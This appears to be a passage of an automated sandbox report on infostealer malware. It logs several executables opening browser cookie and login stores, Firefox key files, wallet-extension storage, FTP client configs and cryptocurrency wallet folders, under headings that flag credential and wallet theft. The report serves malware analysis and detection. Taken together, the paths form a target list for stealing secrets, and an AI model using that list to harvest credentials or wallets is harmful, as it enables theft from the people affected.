                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-wal
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-wal
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
